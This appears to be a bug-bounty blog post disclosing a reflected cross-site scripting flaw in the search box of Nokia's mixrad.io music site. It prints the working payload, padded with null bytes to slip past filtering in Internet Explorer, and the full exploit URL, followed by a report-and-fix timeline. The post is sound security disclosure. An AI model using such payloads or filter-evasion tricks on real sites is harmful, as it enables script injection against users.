Reflected XSS in music.nokia.com (mixrad.io)

My first valid XSS bug submission to Nokia was a textbook example of a reflected Cross-Site Scripting vulnerability.

It was enough to abuse the “Search” box with the payload below, albeit it worked only in Internet Explorer browser:

</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>

After visiting the following URL, the JavaScript code was executed:

http://www.mixrad.io/pl/pl/search/?domain=music&q=</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>

Timeline:

[November 30th 2013] - bug was reported
[January 3rd 2014] - bug was fixed

Leave a Reply

Your email address will not be published. Required fields are marked *